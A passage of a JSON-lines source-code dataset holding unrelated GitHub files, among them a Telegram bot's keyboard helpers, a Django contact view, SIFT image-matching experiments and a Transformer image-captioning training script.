ETA: \")\r\n async with aiohttp.request(\"POST\", \"https://backend.craiyon.com/generate\", json={\"Any Image Name\": prompt}) as resp:\r\n r = await resp.json()\r\n images = r['images']\r\n image = BytesIO()\r\n\r\nbot.run(\"BOT_TOKEN\")\r\n","repo_name":"Sibbir2941/multiversehub","sub_path":"hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":14929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29755610665","text":"from sys import stdin\n\nPoint = tuple[int, int]\nN: int = int(stdin.readline())\n\npoints: list[Point] = [tuple(map(int, stdin.readline().split())) for _ in range(N)]\n\ndef comparePoint(a: Point, b: Point) -> bool:\n ax, ay = a\n bx, by = b\n if ay < by:\n return False\n elif ay == by and ax < bx:\n return False\n return True\n\ndef merge(array: list[Point], start: int, middle: int, end: int):\n temp: list[Point] = []\n if end - start < 2: # 말단의 경우\n if comparePoint(array[start], array[end]):\n temp.append(array[end])\n temp.append(array[start])\n else:\n temp.append(array[start])\n temp.append(array[end])\n else:\n l: int = start\n r: int = middle + 1\n # 두 부분 리스트를 병합한다.\n while l <= middle and r <= end:\n if comparePoint(array[l], array[r]):\n temp.append(array[r])\n r += 1\n else:\n temp.append(array[l])\n l += 1\n # 남아있는 부분 리스트를 모두 임시 리스트에 병합한다.\n while l <= middle:\n temp.append(array[l])\n l += 1\n while r <= end:\n temp.append(array[r])\n r += 1\n for i, e in zip(range(start, end + 1), temp): # start부터 end까지의 인덱스 i와, temp 리스트의 각 요소 e로 반복한다.\n array[i] = e\n\ndef mergeSort(array: list[Point], start: int, end: int):\n if (start < end):\n middle: int = (start + end) // 2\n mergeSort(array, start, middle)\n mergeSort(array, middle + 1, end)\n merge(array, start, middle, end)\n \nmergeSort(points, 0, N - 1)\n\nfor p in points:\n print(*p)","repo_name":"Lapis0875/algorithm_datastructure","sub_path":"boj/boj11651.py","file_name":"boj11651.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18987360600","text":"def maxProfit(prices):\n if not prices or len(prices) < 2:\n return 0\n max_price, min_price, i = 0, prices[0], 1\n while i < len(prices):\n min_price = min(min_price, prices[i])\n max_price = max(max_price, prices[i]-min_price)\n i += 1\n return max_price\n\n#http://liangjiabin.com/blog/2015/04/leetcode-best-time-to-buy-and-sell-stock.html\n\nprint(maxProfit([5,4,3]))\n","repo_name":"gitttttt/lc","sub_path":"q121.py","file_name":"q121.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40582903774","text":"import click\nfrom paco.commands.helpers import paco_home_option, pass_paco_context, handle_exceptions, \\\n cloud_options, init_cloud_command, cloud_args, config_types\n\n\n@click.command(name='provision', short_help='Provision resources to the cloud.')\n@click.option(\n '-a', '--auto-publish-code',\n default=False,\n is_flag=True,\n help=\"\"\"\nAutomatically update Lambda Code assets. 
Lambda resources that use the `zipfile:` to a local filesystem path will automatically publish new code if it differs from the currently published code asset.\n\"\"\"\n)\n@paco_home_option\n@cloud_args\n@cloud_options\n@pass_paco_context\n@handle_exceptions\ndef provision_command(\n paco_ctx,\n verbose,\n nocache,\n yes,\n warn,\n disable_validation,\n quiet_changes_only,\n hooks_only,\n cfn_lint,\n config_scope,\n home='.',\n auto_publish_code=False,\n):\n \"\"\"Provision Cloud Resources\"\"\"\n paco_ctx.auto_publish_code = auto_publish_code\n command = 'provision'\n controller_type, obj = init_cloud_command(\n command,\n paco_ctx,\n verbose,\n nocache,\n yes,\n warn,\n disable_validation,\n quiet_changes_only,\n hooks_only,\n cfn_lint,\n config_scope,\n home\n )\n controller = paco_ctx.get_controller(controller_type, command, obj)\n controller.provision()\n\nprovision_command.help = \"\"\"\nProvision Cloud Resources.\n\n\"\"\" + config_types","repo_name":"waterbear-cloud/paco","sub_path":"src/paco/commands/cmd_provision.py","file_name":"cmd_provision.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"71899386346","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse, HttpResponse\nfrom django.conf import settings \nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom datetime import datetime\nimport json, os,sys\nfrom django.template import Context\nfrom . import accounts\nfrom debadmin.models import contactUs\n\ndef contact_us_add(request):\n if 'admin_session_id' not in request.session:\n return redirect(accounts.login)\n\n contact_us = contactUs.objects.all()\n context = {'contact_us':contact_us, 'contact_active':'active'}\n return render(request, 'contact/contact_us_add.html',context)\n\n\ndef contact_us_data_insertion(request):\n\tif 'admin_session_id' not in request.session:\n\t\treturn redirect(accounts.login)\n\tadmin_session_id = request.session['admin_session_id']\n \n\tupdate_contact_id = request.POST['update_contact_id']\n\taddress = request.POST['address']\n\tcontact_number = request.POST['contact_number']\n\tland_line_number = request.POST['land_line_number']\n\tmail = request.POST['email']\n\tmap_address = request.POST['map_address']\n\tfooter_content = request.POST['footer_content']\n\n\tif update_contact_id:\n\t\tcontact_data = contactUs.objects.filter(id=update_contact_id)[0]\n\t\tcontact_data.address = address\n\t\tcontact_data.contact_number = contact_number\n\t\tcontact_data.land_line_number = land_line_number\n\t\tcontact_data.mail = mail\n\t\tcontact_data.map_address = map_address\n\t\tcontact_data.footer_content = footer_content\n\t\tcontact_data.created_date = datetime.now().date()\n\t\tcontact_data.created_by = admin_session_id\n\n\t\tcontact_data.save(update_fields=['address', 'contact_number','land_line_number','mail','map_address', 'footer_content', 'created_date', 'created_by'])\n\n\telse:\n\t\tobj = contactUs(address=address, contact_number = contact_number, land_line_number = land_line_number, mail = mail, \n\t\tmap_address = map_address, footer_content = footer_content, created_date = datetime.now().date(), created_by = admin_session_id)\n\t\tobj.save()\n\n\tmessages.success(request,'ContactUs Data Updated Successfully!')\n\treturn 
redirect(contact_us_add)","repo_name":"abhaysantra/debscientific","sub_path":"debadmin/views/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10226506572","text":"from telegram import KeyboardButton, ReplyKeyboardMarkup, InlineKeyboardButton, InlineKeyboardMarkup\nfrom .globals import Texts\nfrom . import services\n\n\ndef go_message(context, user_id, message, reply_markup):\n context.bot.send_message(chat_id=user_id, text=message, reply_markup=reply_markup, parse_mode='HTML',\n disable_web_page_preview=True)\n\n\ndef edit_message(context, chat_id, message_id, message, reply_markup):\n try:\n context.bot.edit_message_text(chat_id=chat_id, message_id=message_id, text=message, reply_markup=reply_markup,\n parse_mode='HTML')\n except Exception as e:\n print('ERROR edit message: ', str(e))\n\n\ndef sendFilterCategories(context, chat_id, lang, message_id=None):\n inline_keyboard = []\n categories = services.getCategoryParent()\n for category in categories:\n inline_keyboard.append(\n [InlineKeyboardButton(category[f'name_{lang}'], callback_data=f'filterR_category_{category[\"id\"]}')])\n if message_id:\n edit_message(context, chat_id, message_id, Texts['TEXT_RESUME_SEND_SPECIAL'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, chat_id, Texts['TEXT_RESUME_SEND_SPECIAL'][lang], InlineKeyboardMarkup(inline_keyboard))\n\n\ndef sendFilterSubCategories(context, chat_id, lang, parent_id, message_id):\n inline_keyboard = []\n categories = services.getCategoryChild(parent_id)\n cats = context.user_data['filter_data'].get('sub_cats', [])\n for category in categories:\n if category['id'] not in cats:\n inline_keyboard.append(\n [InlineKeyboardButton(category[f'name_{lang}'], callback_data=f'filterR_child_{category[\"id\"]}')])\n\n if len(inline_keyboard) > 0:\n if len(cats) > 0:\n inline_keyboard.append(\n [\n InlineKeyboardButton(Texts['BTN_SEND_BACK'][lang], callback_data=f'filterR_child_back'),\n InlineKeyboardButton(Texts['BTN_SEND_DALE'][lang], callback_data=f'filterR_child_next')\n ])\n edit_message(context, chat_id, message_id, Texts['TEXT_RESUME_SEND_CATEGORY_MORE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n inline_keyboard.append(\n [\n InlineKeyboardButton(Texts['BTN_SEND_BACK'][lang], callback_data=f'filterR_child_back')\n ])\n edit_message(context, chat_id, message_id, Texts['TEXT_RESUME_SEND_CATEGORY'][lang],\n InlineKeyboardMarkup(inline_keyboard))\n else:\n sendFilterGender(context, chat_id, lang, message_id)\n\n\ndef sendFilterGender(context, user_id, lang, message_id=None):\n\n if lang == 1:\n both_gender = Texts['BTN_SEND_MALE'][lang] + \" va \" + Texts['BTN_SEND_FEMALE'][lang]\n else:\n both_gender = Texts['BTN_SEND_MALE'][lang] + \" и \" + Texts['BTN_SEND_FEMALE'][lang]\n\n inline_keyboard = [\n [\n InlineKeyboardButton(Texts['BTN_SEND_MALE'][lang], callback_data='filterR_gender_man'),\n InlineKeyboardButton(Texts['BTN_SEND_FEMALE'][lang], callback_data='filterR_gender_women')\n ],\n [\n InlineKeyboardButton(both_gender, callback_data='filterR_gender_both'),\n ]\n ]\n if message_id:\n edit_message(context, user_id, message_id, Texts['TEXT_VACANCY_GENDER'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, user_id, Texts['TEXT_VACANCY_GENDER'][lang], InlineKeyboardMarkup(inline_keyboard))\n\n\ndef sendFilterLanguages(context, chat_id, lang, message_id=None):\n inline_keyboard = []\n 
languages = services.getLanguages()\n langs = context.user_data['filter_data'].get('langs', [])\n for language in languages:\n if language['id'] not in langs:\n inline_keyboard.append(\n [InlineKeyboardButton(language[f'name_{lang}'], callback_data=f'filterR_language_{language[\"id\"]}')])\n\n if len(inline_keyboard) > 0:\n if len(langs) > 0:\n inline_keyboard.append(\n [\n InlineKeyboardButton(Texts['BTN_SEND_DALE'][lang], callback_data=f'filterR_language_next')\n ])\n if message_id:\n edit_message(context, chat_id, message_id, Texts['TEXT_SELECT_LANGUAGE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, chat_id, Texts['TEXT_SELECT_LANGUAGE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n if context.user_data.get('filter_state', 0) == 3:\n pass\n else:\n sendFilterExperience(context, chat_id, lang, message_id)\n\n\ndef sendFilterExperience(context, chat_id, lang, message_id=None):\n inline_keyboard = []\n experiences = services.getExperiences()\n for experience in experiences:\n\n inline_keyboard.append(\n [InlineKeyboardButton(experience[f'name_{lang}'], callback_data=f'filterR_experience_{experience[\"id\"]}')])\n if message_id:\n edit_message(context, chat_id, message_id, Texts['TEXT_SELECT_EXPERIENCE'][lang], InlineKeyboardMarkup(inline_keyboard))\n else:\n go_message(context, chat_id, Texts['TEXT_SELECT_EXPERIENCE'][lang], InlineKeyboardMarkup(inline_keyboard))\n\n\ndef sendSearchResultMenu(context, use_id, message, lang):\n buttons = [\n [KeyboardButton(text=Texts['BTN_SHOW_MORE_RESUME'][lang])],\n [KeyboardButton(text=Texts['BTN_CHANGE_REQUEST'][lang])],\n # [KeyboardButton(text=Texts['BTN_SUBSCRIBE_RESUME'][lang])],\n [KeyboardButton(text=Texts['BTN_MAIN_MENU'][lang])],\n ]\n go_message(context, use_id, message, ReplyKeyboardMarkup(buttons, one_time_keyboard=True, resize_keyboard=True))\n\ndef sendSearchEditMenu(context, use_id, message, lang):\n buttons = [\n [KeyboardButton(text=Texts['BTN_FILTER_EDIT_CATEGORY'][lang]), KeyboardButton(text=Texts['BTN_FILTER_EDIT_GENDER'][lang])],\n [KeyboardButton(text=Texts['BTN_FILTER_EDIT_LANGUAGE'][lang]), KeyboardButton(text=Texts['BTN_FILTER_EDIT_EXPERIENCE'][lang])],\n [KeyboardButton(text=Texts['BTN_SHOW_RESUMES'][lang])],\n [KeyboardButton(text=Texts['BTN_MAIN_MENU'][lang])],\n ]\n go_message(context, use_id, message, ReplyKeyboardMarkup(buttons, one_time_keyboard=True, resize_keyboard=True))","repo_name":"xudikk/telegram_bot","sub_path":"src/yesboss/tg/find_resume.py","file_name":"find_resume.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36478039028","text":"#!/usr/bin/env python\n#---------------------------------------------------------------------------\n\nimport sys, os, glob\nimport wx\nfrom wx.tools import helpviewer\n\n\n# Figure out the path where this app is located\nif __name__ == '__main__':\n basePath = os.path.dirname(sys.argv[0])\nelse:\n basePath = os.path.dirname(__file__)\nif not basePath:\n basePath = '.'\n\n\n# test for write access\nif os.access(basePath, os.W_OK):\n\n # setup the args\n args = ['',\n '--cache='+basePath,\n os.path.join(basePath, 'wx.zip'),\n ]\n\n # add any other .zip files found\n for file in glob.glob(os.path.join(basePath, \"*.zip\")):\n if file not in args:\n args.append(file)\n\n # launch helpviewer\n helpviewer.main(args)\n\nelse:\n app = wx.App()\n dlg = wx.MessageDialog(None,\n \"The wxDocs need to be located in a directory that is writable by 
you. \"\n                           \"I am unable to start the viewer in its current location.\",\n                           \"Error!\", wx.OK|wx.ICON_EXCLAMATION)\n    dlg.ShowModal()\n    dlg.Destroy()\n    app.MainLoop()\n\n#---------------------------------------------------------------------------\n\n","repo_name":"wxWidgets/wxPython-Classic","sub_path":"distrib/viewdocs.py","file_name":"viewdocs.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"37"} +{"seq_id":"43404966634","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image, ImageEnhance, ImageFilter\nfrom utils import match, gaus_noise\nimport cv2 as cv\n\nimage1 = Image.open(r\"image/image1.jpg\")\nimage1 = np.array(image1)\nimage2 = Image.open(r\"image/image2.jpg\")\n\nimage2 = np.array(image2)\nsift = cv.SIFT_create()\n# Use SIFT to find the key points and their descriptors\nkp1, des1 = sift.detectAndCompute(image1, None)\nkp2, des2 = sift.detectAndCompute(image2, None)\nkp_image1 = cv.drawKeypoints(image1, kp1, None)\nkp_image2 = cv.drawKeypoints(image2, kp2, None)\nplt.figure(figsize=(20, 8))\nplt.subplot(121)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(kp_image1)\nplt.subplot(122)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(kp_image2)\nplt.savefig(r\"image/point.png\", bbox_inches='tight')\n\nplt.figure(figsize=(20, 15))\nmatcher = cv.BFMatcher()\nraw_matches = matcher.knnMatch(des1, des2, k=2)\ngood_matches = []\nfor m1, m2 in raw_matches:\n    # Lowe's ratio test: if the closest match is clearly nearer than the second-closest one, keep the closest match and treat the matched pair as a good_match\n    if m1.distance < 0.85 * m2.distance:\n        good_matches.append([m1])\nptsA = np.float32([kp1[m[0].queryIdx].pt for m in good_matches]).reshape(-1, 1, 2)\nptsB = np.float32([kp2[m[0].trainIdx].pt for m in good_matches]).reshape(-1, 1, 2)\nH, status = cv.findHomography(ptsA, ptsB, cv.RANSAC)\nplt.subplot(211)\nplt.title(\"Before RANSAC\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nmatches = cv.drawMatchesKnn(image1, kp1, image2, kp2, good_matches, None, flags=2)\nplt.imshow(matches)\nplt.subplot(212)\nplt.title(\"After RANSAC\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nmatches = cv.drawMatchesKnn(image1, kp1, image2, kp2, good_matches, None, matchesMask=status, flags=2)\nplt.imshow(matches)\nplt.savefig(r\"image/align.png\", bbox_inches='tight')\n\n'''\nplt.figure(figsize=(40, 15))\nenh_bri = ImageEnhance.Brightness(image2)\nenh_col = ImageEnhance.Color(image2)\nenh_con = ImageEnhance.Contrast(image2)\nplt.subplot(241)\nplt.title(\"High Brightness\", fontsize=36)\nnew_img = enh_bri.enhance(factor=1.5)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(245)\nplt.title(\"Low Brightness\", fontsize=36)\nnew_img = enh_bri.enhance(factor=0.6)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(242)\nplt.title(\"High Saturation\", fontsize=36)\nnew_img = enh_col.enhance(factor=1.5)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(246)\nplt.title(\"Low Saturation\", fontsize=36)\nnew_img = enh_col.enhance(factor=0.6)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(243)\nplt.title(\"High Contrast\", fontsize=36)\nnew_img = enh_con.enhance(factor=1.5)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(247)\nplt.title(\"Low Contrast\", fontsize=36)\nnew_img = enh_con.enhance(factor=0.6)\nnew_img = np.array(new_img)\nmatch(image1, new_img)\nplt.subplot(244)\nplt.title(\"Noise\", fontsize=36)\nnew_img = np.array(image2)\nnew_img = gaus_noise(new_img, sigma=0.4)\nmatch(image1, 
new_img)\nplt.subplot(248)\nplt.title(\"Mask\", fontsize=36)\nnew_img = np.array(image2)\nstep = 200\nnew_img[300 - step:300 + step, 200 - step:200 + step, :] = 0\nmatch(image1, new_img)\nplt.savefig(r\"image/robust.png\", bbox_inches='tight')\n'''\n\n'''\nplt.figure(figsize=(40, 15))\nplt.subplot(241)\nplt.title(\"Blur(sigma:1)\", fontsize=36)\nnew_img = image2.filter(ImageFilter.GaussianBlur(radius=1))\nnew_img = np.array(new_img)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(new_img)\nplt.subplot(245)\nmatch(image1, new_img)\nplt.subplot(242)\nplt.title(\"Blur(sigma:5)\", fontsize=36)\nnew_img = image2.filter(ImageFilter.GaussianBlur(radius=5))\nnew_img = np.array(new_img)\nplt.xticks([])\nplt.yticks([])\nplt.imshow(new_img)\nplt.subplot(246)\nmatch(image1, new_img)\nplt.subplot(243)\nplt.title(\"Shear(0.3)\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nnew_img = np.array(image2)\nM = np.array([[1, 0.3, 0], [0.3, 1, 0]])\nnew_img = cv.warpAffine(new_img, M, (int(1.5 * new_img.shape[1]), int(1.5 * new_img.shape[0])))\nplt.imshow(new_img)\nplt.subplot(247)\nmatch(image1, new_img)\nplt.subplot(244)\nplt.title(\"Shear(0.5)\", fontsize=36)\nplt.xticks([])\nplt.yticks([])\nnew_img = np.array(image2)\nM = np.array([[1, 0.5, 0], [0.5, 1, 0]])\nnew_img = cv.warpAffine(new_img, M, (int(1.5 * new_img.shape[1]), int(1.5 * new_img.shape[0])))\nplt.imshow(new_img)\nplt.subplot(248)\nmatch(image1, new_img)\nplt.savefig(r\"image/attack.png\", bbox_inches='tight')\n'''\n\n'''\nplt.figure(figsize=(40, 8))\nnew_img = np.array(image2)\nplt.subplot(141)\nplt.title(\"Regular\", fontsize=36)\nmatch(image1, new_img, method=0)\nplt.subplot(142)\nplt.title(\"RANSAC\", fontsize=36)\nmatch(image1, new_img, method=cv.RANSAC)\nplt.subplot(143)\nplt.title(\"LMEDS\", fontsize=36)\nmatch(image1, new_img, method=cv.LMEDS)\nplt.subplot(144)\nplt.title(\"PROSAC\", fontsize=36)\nmatch(image1, new_img, method=cv.RHO)\nplt.savefig(r\"image/method.png\", bbox_inches='tight')\n'''\n","repo_name":"nachewigkeit/XJTU-CV-homework","sub_path":"homework3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39388129449","text":"from .santa_fe_trail import SantaFeTrail\nfrom .cart_pole import CartPole\nfrom .mountain_car import MountainCar\nfrom typing import Iterable, Dict, Callable\nfrom task import ITask\n\n__all__ = ['get_tasks', 'get_choices', 'get_task']\n\n\ndef get_tasks() -> Dict[str, Callable[[], ITask]]:\n return {\n 'santa-fe-trail': SantaFeTrail,\n 'cart-pole': CartPole,\n 'mountain-car': MountainCar,\n }\n\n\ndef get_choices() -> Iterable[str]:\n return get_tasks().keys()\n\n\ndef get_task(task_name: str, is_player: bool = False) -> ITask:\n instance = get_tasks()[task_name]()\n instance.set_name(task_name)\n if is_player:\n instance.on_player()\n return instance\n","repo_name":"technote-space/genetic-algorithms-py","sub_path":"src/tasks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"18440709555","text":"# This script is train for the Transformer baseline \n# refer from: https://github.com/aimagelab/meshed-memory-transformer \n\nimport random \nimport torch\nfrom torch.nn.functional import batch_norm \nfrom torch.optim import Adam \nfrom torch.optim.lr_scheduler import LambdaLR \nfrom torch.nn import NLLLoss \n\nimport argparse, os, pickle \nimport 
numpy as np\nfrom tqdm import tqdm \nfrom torch.utils.data import dataloader \nfrom model.transformer import Transformer \nimport multiprocessing\nimport itertools \nfrom shutil import copyfile \n\nfrom data import ImageDetectionsField, TextField, RawField\nfrom data import DataLoader, COCO \nfrom model import Transformer, VisualEncoder, CaptionDecoder, ScaledDotProductAttention\nimport evaluation \nfrom evaluation import PTBTokenizer, Cider\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nrandom.seed(2022)\ntorch.manual_seed(2022)\nnp.random.seed(2022)\n\n\ndef train_xe(model, dataloader, optim, text_field):\n    # Training with cross-entropy\n    model.train()\n    running_loss = .0\n    with tqdm(desc='Epoch %d - train' % e, unit='it', total=len(dataloader)) as pbar:\n        for it, (detections, captions) in enumerate(dataloader):\n            detections, captions = detections.to(device), captions.to(device) \n            out = model(detections, captions)\n            optim.zero_grad()\n            captions_gt = captions[:, 1:].contiguous()\n            out = out[:, :-1].contiguous()\n            loss = loss_fn(out.view(-1, len(text_field.vocab)), captions_gt.view(-1))\n            loss.backward()\n\n            optim.step()\n            this_loss = loss.item()\n            running_loss += this_loss\n\n            pbar.set_postfix(loss=running_loss / (it + 1))\n            pbar.update()\n            scheduler.step()  # advance the Noam warmup schedule once per iteration\n\n    loss = running_loss / len(dataloader)\n    return loss\n\n\n\ndef train_scst(model, dataloader, optim, cider, text_field):\n    # Training with self-critical\n    tokenizer_pool = multiprocessing.Pool()\n    running_reward = .0\n    running_reward_baseline = .0\n    model.train()\n    running_loss = .0\n    seq_len = 20\n    beam_size = 5\n\n    with tqdm(desc='Epoch %d - train' % e, unit='it', total=len(dataloader)) as pbar:\n        for it, (detections, caps_gt) in enumerate(dataloader):\n            detections = detections.to(device)\n            outs, log_probs = model.beam_search(detections, seq_len, text_field.vocab.stoi['<eos>'],\n                                                beam_size, out_size=beam_size)\n            optim.zero_grad()\n\n            # Rewards\n            caps_gen = text_field.decode(outs.view(-1, seq_len))\n            caps_gt = list(itertools.chain(*([c, ] * beam_size for c in caps_gt)))\n            caps_gen, caps_gt = tokenizer_pool.map(evaluation.PTBTokenizer.tokenize, [caps_gen, caps_gt])\n            reward = cider.compute_score(caps_gt, caps_gen)[1].astype(np.float32)\n            reward = torch.from_numpy(reward).to(device).view(detections.shape[0], beam_size)\n            reward_baseline = torch.mean(reward, -1, keepdim=True)\n            loss = -torch.mean(log_probs, -1) * (reward - reward_baseline)\n\n            loss = loss.mean()\n            loss.backward()\n            optim.step()\n\n            running_loss += loss.item()\n            running_reward += reward.mean().item()\n            running_reward_baseline += reward_baseline.mean().item()\n            pbar.set_postfix(loss=running_loss / (it + 1), reward=running_reward / (it + 1),\n                             reward_baseline=running_reward_baseline / (it + 1))\n            pbar.update() \n            \n\n    loss = running_loss / len(dataloader)\n    reward = running_reward / len(dataloader)\n    reward_baseline = running_reward_baseline / len(dataloader)\n    return loss, reward, reward_baseline\n\n\n\ndef evaluate_metrics(model, dataloader, text_field):\n    import itertools\n    model.eval()\n    gen = {}\n    gts = {}\n    with tqdm(desc='Epoch %d - evaluation' % e, unit='it', total=len(dataloader)) as pbar:\n        for it, (images, caps_gt) in enumerate(iter(dataloader)):\n            images = images.to(device)\n            with torch.no_grad():\n                out, _ = model.beam_search(images, 20, text_field.vocab.stoi['<eos>'], 5, out_size=1)\n            caps_gen = text_field.decode(out, join_words=False)\n            for i, (gts_i, gen_i) in enumerate(zip(caps_gt, caps_gen)):\n                gen_i = ' 
'.join([k for k, g in itertools.groupby(gen_i)])\n                gen['%d_%d' % (it, i)] = [gen_i, ]\n                gts['%d_%d' % (it, i)] = gts_i\n            pbar.update()\n\n    gts = evaluation.PTBTokenizer.tokenize(gts)\n    gen = evaluation.PTBTokenizer.tokenize(gen)\n    scores, _ = evaluation.compute_scores(gts, gen)\n    return scores\n\n\nif __name__ == '__main__': \n    use_device = torch.cuda.is_available()\n    device = torch.device('cuda' if use_device else 'cpu') \n    parser = argparse.ArgumentParser(description='Transformer Image Captioning')\n    parser.add_argument('--features_path', type=str, default='COCO/features/coco_detections.hdf5')\n    parser.add_argument('--annotation_folder', type=str, default='COCO/annotations') \n    parser.add_argument('--workers', type=int, default=0) \n    parser.add_argument('--batch_size', type=int, default=5)\n    parser.add_argument('--exp_name', type=str, default='Transformer')\n    args = parser.parse_args()\n\n    print(args)\n\n    # Pipeline for image regions\n    image_field = ImageDetectionsField(detections_path=args.features_path, max_detections=50, load_in_tmp=False)\n\n    # Pipeline for text\n    text_field = TextField(init_token='<bos>', eos_token='<eos>', lower=True, tokenize='spacy',\n                           remove_punctuation=True, nopoints=False) \n    \n    # Create the dataset\n    dataset = COCO(image_field, text_field, 'COCO/images/', args.annotation_folder, args.annotation_folder)\n    train_dataset, val_dataset, test_dataset = dataset.splits \n    dict_dataset_val = val_dataset.image_dictionary({'image': image_field, 'text': RawField()})\n    dict_dataset_test = test_dataset.image_dictionary({'image': image_field, 'text': RawField()})\n\n    if not os.path.isfile('vocab_%s.pkl' % args.exp_name):\n        print(\"Building vocabulary\")\n        text_field.build_vocab(train_dataset, val_dataset, min_freq=5)\n        pickle.dump(text_field.vocab, open('vocab_%s.pkl' % args.exp_name, 'wb'))\n    else:\n        text_field.vocab = pickle.load(open('vocab_%s.pkl' % args.exp_name, 'rb')) \n    \n    # print(text_field.vocab.freqs) \n    # Model Load\n    encoder = VisualEncoder(3, 0, attention_module=ScaledDotProductAttention) \n    decoder = CaptionDecoder(len(text_field.vocab), 54, 3, text_field.vocab.stoi['<pad>']) \n    model = Transformer(text_field.vocab.stoi['<bos>'], encoder, decoder).to(device) \n    \n    dict_dataset_train = train_dataset.image_dictionary({'image': image_field, 'text': RawField()}) \n    ref_caps_train = list(train_dataset.text)\n    cider_train = Cider(PTBTokenizer.tokenize(ref_caps_train))\n\n    def lambda_lr(s):\n        warm_up = 10000\n        s += 1\n        return (model.d_model ** -.5) * min(s ** -.5, s * warm_up ** -1.5)\n\n    # Initial conditions\n    start_epoch = 0 \n    optim = Adam(model.parameters(), lr=1, betas=(0.9, 0.98)) \n    scheduler = LambdaLR(optim, lambda_lr) \n    loss_fn = NLLLoss(ignore_index=text_field.vocab.stoi['<pad>'])\n    use_rl = False \n    best_cider = .0\n    patience = 0\n\n\n    print('Training begins!')\n    for e in range(start_epoch, start_epoch+80): \n        dataloader_train = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=False, num_workers=args.workers, drop_last=True)\n        dict_dataloader_val = DataLoader(dict_dataset_val, batch_size=args.batch_size // 5) \n        dict_dataloader_train = DataLoader(dict_dataset_train, batch_size=args.batch_size // 5, shuffle=False,\n                                           num_workers=args.workers)\n        dict_dataloader_test = DataLoader(dict_dataset_test, batch_size=args.batch_size // 5)\n\n        if not use_rl:\n            train_loss = train_xe(model, dataloader_train, optim, text_field)\n        else: \n            train_loss, reward, reward_baseline = train_scst(model, dict_dataloader_train, optim, cider_train, text_field)\n        # 
Validation scores \n scores = evaluate_metrics(model, dict_dataloader_val, text_field)\n print(\"Validation scores\", scores)\n \n val_cider = scores['CIDEr']\n\n # Test scores\n scores = evaluate_metrics(model, dict_dataloader_test, text_field)\n print(\"Test scores\", scores)\n\n # Prepare for next epoch\n best = False\n if val_cider >= best_cider:\n best_cider = val_cider\n patience = 0\n best = True\n else:\n patience += 1\n\n switch_to_rl = False\n exit_train = False\n if patience == 5:\n if not use_rl:\n use_rl = True\n switch_to_rl = True\n patience = 0\n optim = Adam(model.parameters(), lr=5e-6)\n print(\"Switching to RL\")\n else:\n print('patience reached.')\n exit_train = True\n \n torch.save({\n 'torch_rng_state': torch.get_rng_state(),\n 'numpy_rng_state': np.random.get_state(),\n 'random_rng_state': random.getstate(),\n 'epoch': e,\n 'state_dict': model.state_dict(),\n 'optimizer': optim.state_dict(),\n 'scheduler': scheduler.state_dict(),\n 'use_rl': use_rl,\n }, 'ckpt/%s_last.pth' % args.exp_name) \n \n if best:\n copyfile('ckpt/%s_last.pth' % args.exp_name, 'ckpt/%s_best.pth' % args.exp_name)\n \n if exit_train: \n break \n \n","repo_name":"feizc/Diverse-Image-Caption","sub_path":"train_Transformer.py","file_name":"train_Transformer.py","file_ext":"py","file_size_in_byte":9887,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"32562324457","text":"import json\nimport pprint\nimport xlsxwriter\nimport time\nimport csv\n\nimport pprint\nimport sys\nimport pandas as pd\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\n\nimport re \n\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv() # read .env file\n\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument(\"window-size=1920x1080\")\ndriver = webdriver.Chrome('chromedriver.exe') \ndf = pd.DataFrame(columns=['website','phone 